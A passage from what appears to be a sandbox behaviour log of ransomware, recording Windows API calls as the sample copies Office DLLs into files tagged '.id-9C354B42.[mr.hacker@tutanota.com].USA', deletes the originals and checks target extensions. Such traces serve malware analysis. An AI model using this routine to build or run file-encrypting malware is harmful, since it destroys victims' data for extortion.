Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0058.988] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.988] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.988] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0058.988] GetLastError () returned 0x0 [0058.988] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0xf73a8, lpOverlapped=0x0) returned 1 [0059.006] WriteFile (in: hFile=0x23c, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xf73b0, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xf73b0, lpOverlapped=0x0) returned 1 [0059.960] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.960] WriteFile (in: hFile=0x23c, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0059.961] SetEndOfFile (hFile=0x23c) returned 1 [0059.961] CloseHandle (hObject=0x23c) returned 1 [0059.961] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.961] SetEndOfFile (hFile=0x22c) returned 1 [0059.969] CloseHandle (hObject=0x22c) returned 1 [0059.969] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0059.969] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll")) returned 1 [0059.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0059.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0059.969] lstrlenW (lpString=".doc") returned 4 [0059.969] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.969] lstrlenW (lpString=".docx") returned 5 [0059.969] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0059.969] lstrlenW (lpString=".pdf") returned 4 [0059.969] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.970] lstrlenW (lpString=".xls") returned 4 [0059.970] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.970] lstrlenW (lpString=".xlsx") returned 5 [0059.970] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0059.970] lstrlenW (lpString=".ppt") returned 4 [0059.970] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0059.970] lstrlenW (lpString=".zip") returned 4 [0059.970] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.970] lstrlenW (lpString=".rar") returned 4 [0059.970] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.970] lstrlenW (lpString=".bz2") returned 4 [0059.970] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.970] lstrlenW (lpString=".7z") returned 3 [0059.970] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0059.970] lstrlenW (lpString=".dbf") returned 4 [0059.970] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0059.970] lstrlenW (lpString=".1cd") returned 4 [0059.970] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0059.970] lstrlenW (lpString=".jpg") returned 4 [0059.970] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0059.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0059.970] lstrlenW (lpString=".doc") returned 4 [0059.970] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.970] lstrlenW (lpString=".docx") returned 5 [0059.970] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0059.970] lstrlenW (lpString=".pdf") returned 4 [0059.970] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.970] lstrlenW (lpString=".xls") returned 4 [0059.970] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.970] lstrlenW (lpString=".xlsx") returned 5 [0059.970] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0059.970] lstrlenW (lpString=".ppt") returned 4 [0059.971] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0059.971] lstrlenW (lpString=".zip") returned 4 [0059.971] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.971] lstrlenW (lpString=".rar") returned 4 [0059.971] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.971] lstrlenW (lpString=".bz2") returned 4 [0059.971] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.971] lstrlenW (lpString=".7z") returned 3 [0059.971] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0059.971] lstrlenW (lpString=".dbf") returned 4 [0059.971] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0059.971] lstrlenW (lpString=".1cd") returned 4 [0059.971] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0059.971] lstrlenW (lpString=".jpg") returned 4 [0059.971] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.971] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0059.971] lstrlenW (lpString="ACEODDBS.DLL") returned 12 [0059.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0059.974] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=15800) returned 1 [0059.974] CloseHandle (hObject=0x22c) returned 1 [0059.974] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll")) returned 0x20 [0059.974] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0059.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0059.974] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.974] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0059.975] GetLastError () returned 0x0 [0059.975] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x3db8, lpOverlapped=0x0) returned 1 [0059.976] WriteFile (in: hFile=0x23c, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0x3dc0, lpOverlapped=0x0) returned 1 [0059.977] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.978] WriteFile (in: hFile=0x23c, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.978] SetEndOfFile (hFile=0x23c) returned 1 [0059.978] CloseHandle (hObject=0x23c) returned 1 [0059.978] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.978] SetEndOfFile (hFile=0x22c) returned 1 [0059.979] CloseHandle (hObject=0x22c) returned 1 [0059.979] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0059.979] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll")) returned 1 [0059.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0059.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0059.979] lstrlenW (lpString=".doc") returned 4 [0059.979] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.979] lstrlenW (lpString=".docx") returned 5 [0059.979] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0059.979] lstrlenW (lpString=".pdf") returned 4 [0059.979] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.979] lstrlenW (lpString=".xls") returned 4 [0059.979] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.979] lstrlenW (lpString=".xlsx") returned 5 [0059.979] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0059.979] lstrlenW (lpString=".ppt") returned 4 [0059.979] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0059.980] lstrlenW (lpString=".zip") returned 4 [0059.980] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.980] lstrlenW (lpString=".rar") returned 4 [0059.980] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.980] lstrlenW (lpString=".bz2") returned 4 [0059.980] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.980] lstrlenW (lpString=".7z") returned 3 [0059.980] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0059.980] lstrlenW (lpString=".dbf") returned 4 [0059.980] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0059.980] lstrlenW (lpString=".1cd") returned 4 [0059.980] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0059.980] lstrlenW (lpString=".jpg") returned 4 [0059.980] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0059.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0059.980] lstrlenW (lpString=".doc") returned 4 [0059.980] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.980] lstrlenW (lpString=".docx") returned 5 [0059.980] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0059.980] lstrlenW (lpString=".pdf") returned 4 [0059.980] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.980] lstrlenW (lpString=".xls") returned 4 [0059.980] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.980] lstrlenW (lpString=".xlsx") returned 5 [0059.980] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0059.980] lstrlenW (lpString=".ppt") returned 4 [0059.980] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0059.980] lstrlenW (lpString=".zip") returned 4 [0059.980] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.980] lstrlenW (lpString=".rar") returned 4 [0059.980] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.980] lstrlenW (lpString=".bz2") returned 4 [0059.981] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.981] lstrlenW (lpString=".7z") returned 3 [0059.981] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0059.981] lstrlenW (lpString=".dbf") returned 4 [0059.981] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0059.981] lstrlenW (lpString=".1cd") returned 4 [0059.981] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0059.981] lstrlenW (lpString=".jpg") returned 4 [0059.981] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.981] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0059.981] lstrlenW (lpString="ACEODEXL.DLL") returned 12 [0059.981] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0059.982] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=15800) returned 1 [0059.982] CloseHandle (hObject=0x22c) returned 1 [0059.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll")) returned 0x20 [0059.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0059.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0059.982] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.982] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0059.983] GetLastError () returned 0x0 [0059.983] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x3db8, lpOverlapped=0x0) returned 1 [0060.165] WriteFile (in: hFile=0x23c, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0x3dc0, lpOverlapped=0x0) returned 1 [0060.166] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.166] WriteFile (in: hFile=0x23c, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.166] SetEndOfFile (hFile=0x23c) returned 1 [0060.757] CloseHandle (hObject=0x23c) returned 1 [0060.757] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.757] SetEndOfFile (hFile=0x22c) returned 1 [0060.792] CloseHandle (hObject=0x22c) returned 1 [0060.792] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.793] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll")) returned 1 [0060.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0060.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0060.793] lstrlenW (lpString=".doc") returned 4 [0060.793] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.793] lstrlenW (lpString=".docx") returned 5 [0060.793] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0060.793] lstrlenW (lpString=".pdf") returned 4 [0060.793] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.793] lstrlenW (lpString=".xls") returned 4 [0060.793] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.793] lstrlenW (lpString=".xlsx") returned 5 [0060.793] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0060.793] lstrlenW (lpString=".ppt") returned 4 [0060.793] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0060.793] lstrlenW (lpString=".zip") returned 4 [0060.793] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.793] lstrlenW (lpString=".rar") returned 4 [0060.793] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.793] lstrlenW (lpString=".bz2") returned 4 [0060.793] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.793] lstrlenW (lpString=".7z") returned 3 [0060.793] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0060.794] lstrlenW (lpString=".dbf") returned 4 [0060.794] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0060.794] lstrlenW (lpString=".1cd") returned 4 [0060.794] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0060.794] lstrlenW (lpString=".jpg") returned 4 [0060.794] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0060.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0060.794] lstrlenW (lpString=".doc") returned 4 [0060.794] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.794] lstrlenW (lpString=".docx") returned 5 [0060.794] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0060.794] lstrlenW (lpString=".pdf") returned 4 [0060.794] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.794] lstrlenW (lpString=".xls") returned 4 [0060.794] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.794] lstrlenW (lpString=".xlsx") returned 5 [0060.794] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0060.794] lstrlenW (lpString=".ppt") returned 4 [0060.794] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0060.794] lstrlenW (lpString=".zip") returned 4 [0060.794] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.794] lstrlenW (lpString=".rar") returned 4 [0060.794] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.794] lstrlenW (lpString=".bz2") returned 4 [0060.794] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.794] lstrlenW (lpString=".7z") returned 3 [0060.794] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0060.794] lstrlenW (lpString=".dbf") returned 4 [0060.795] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0060.795] lstrlenW (lpString=".1cd") returned 4 [0060.795] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0060.795] lstrlenW (lpString=".jpg") returned 4 [0060.795] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.795] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0060.795] lstrlenW (lpString="ACETXT.DLL") returned 10 [0060.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0060.795] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=297360) returned 1 [0060.795] CloseHandle (hObject=0x22c) returned 1 [0060.795] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll")) returned 0x20 [0060.795] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0060.796] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.796] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 